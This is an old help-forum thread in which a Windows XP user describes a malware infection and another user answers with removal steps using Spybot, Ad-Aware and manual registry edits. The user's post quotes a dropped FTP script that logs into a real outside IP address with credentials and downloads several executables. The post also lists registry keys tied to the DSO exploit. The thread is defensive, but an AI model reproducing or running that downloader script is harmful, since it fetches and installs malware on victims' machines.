Internet Explorer doesn't upload after viruses/trojans infected my computer...

B

barb

I'm using windows XP. While I was browsing some site (not a porn
one..), suddenly my computer froze up. I disconnected from the
internet, and saw various files have been added to my computer. I
opened one of the files that got in, a file named 0 (in windowsא
system32), and got this:

open 207.58.159.14
tmpacct
12345
bin
get julie.exe
get newdevin.exe
get IF01.exe
get istinstall_154074.exe
get sd.exe
get sdmsg.exe
get TVM_B5.EXE
get 06wu29rd.exe
get dp807615.exe
bye

I tried to run Adaware, it froze halfway through, so I ran it again
and before it froze again I aborted, and was able to delete what it
found when I aborted–
Hkey_classes_root:CLSID\{5F1ABCDB-A875-46c1-8345-B72A4567E486}
After that, internet explorer wouldn't launch…

I ran Spybot, it found several problems, when I clicked the fix
problem button, it froze.

Now I cannot launch Internet Explorer – the whole computer freezes up.
I'm writing here using Netscape, and would really like to be able to
use my explorer again. HELP…. You're my only home practically…
How can I fix this? Should I change something in the registery?

BTW, the problems spybot found (which I'm unable to fix since the
program freezes) are:

Avenue A, Inc.: Tracking cookie (Internet Explorer: MYNAME) (Cookie,
nothing done)


BookedSpace: Browser helper object (Registry key, nothing done)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser
Helper Objects\{0019C3E2-DD48-4A6D-ABCD-8D32436323D9}

BookedSpace: Class ID (Registry key, nothing done)
HKEY_CLASSES_ROOT\CLSID\{0019C3E2-DD48-4A6D-ABCD-8D32436323D9}

BookedSpace: Root class (Registry key, nothing done)
HKEY_CLASSES_ROOT\BookedSpace.Extension.5

BookedSpace: Root class (Registry key, nothing done)
HKEY_CLASSES_ROOT\BookedSpace.Extension

BookedSpace: Settings (Registry key, nothing done)
HKEY_CLASSES_ROOT\AppID\BookedSpace.DLL

DSO Exploit: Data source object exploit (Registry change, nothing
done)
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\0\1004!=W=3

DSO Exploit: Data source object exploit (Registry change, nothing
done)
HKEY_USERS\S-1-5-21-2237029002-4258192708-1256799619-1004\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\0\1004!=W=3

DSO Exploit: Data source object exploit (Registry change, nothing
done)
HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\0\1004!=W=3

DSO Exploit: Data source object exploit (Registry change, nothing
done)
HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\0\1004!=W=3

DSO Exploit: Data source object exploit (Registry change, nothing
done)
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet
Settings\Zones\0\1004!=W=3
 
J

Juan

Disconnect the computer from the wire connection to the Internet.
Start your computer in safe mode to positively delete the spyware with
Spybot and Adaware... before running both programs, delete the
cookies with the buttons in the IExplorer\Tools\Internet Options\General
Also delete the Temporary internet Files with the button next to delete
cookies
Press ctrl+alt+del simultaneously select Processes Tab any process
taking most ot the memory (with all programs closed) is most likely the
trojan-hijacker-malware.. select it and click End Process and run the
anti-spyware programs

A description of the Safe Mode Boot Options in Windows XP
http://support.microsoft.com/default.aspx?scid=kb;en-us;315222&Product=winxp

If the problem with the programs should be repeated (rare posibility)
and you are unable to delete the spyware, go into the registry and delete
the parasites by hand.. go to Start\Run\regedit.msc and hit enter

Delete the keys the programs detected (those you mentioned) except for
the ones from the DSO Exploit ..
For the keys about the DSO Exploit, you have to consider this:
The DSO Exploit vulnerability was patched by microsoft, IF you have kept
your system updated, the Spybot reading is probably a false reading
IF you have not kept your system updated, the reading is probably TRUE
and you must delete the keys.
One more thing to consider is that the 1004 entry must be a REG_DWORD and
not a Alfanumeric Value REG_SZ if it is a REG_SZ, delete it and create a new
REG_DWORD with same name 1004 and set to 0 ....

Nexto go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Run and Run- both should only have the predetermined alfanumeric value

Nexto go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\
Run\should have the predetermined alfanumeric value and a few other alfa
numeric values
set there by the antivirus, any other values here should be considered as
malicious and
should be deleted unless you have installed some program that is set to run
at startup.
and Run-\should only have the predetermined alfanumeric value and any other
value
from program you could have installed... if there is someting else there,
delete it.


Before you try anything, install this program see if it does the job. Run it
in safe mode.
CoolWWWSearch SmartKiller MiniRemoval
http://www.spychecker.com/program/miniremovalcw.html
removes CoolWebSearch hijackers.

Spybot Search & Destroy (free)
http://www.safer-networking.net/

Lavasoft AdAware SE (free)
http://www.lavasoft.de

SpywareBlaster (free)
http://www.javacoolsoftware.com/spywareblaster.html



-------------Original Message-----------
 

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments. After that, you can post your question and our members will help you out.

Ask a Question

Similar Threads

Bothersome Reg. Entries 3
Spybot-Search and Destroy 2
internet shut down help!!!!!!!!! 1
XP New User - spyware question 18
DSO Exploit 1
HKeys DSO 3
OT: Spybot Search And Distroy 2
DSO Exploit 5

Top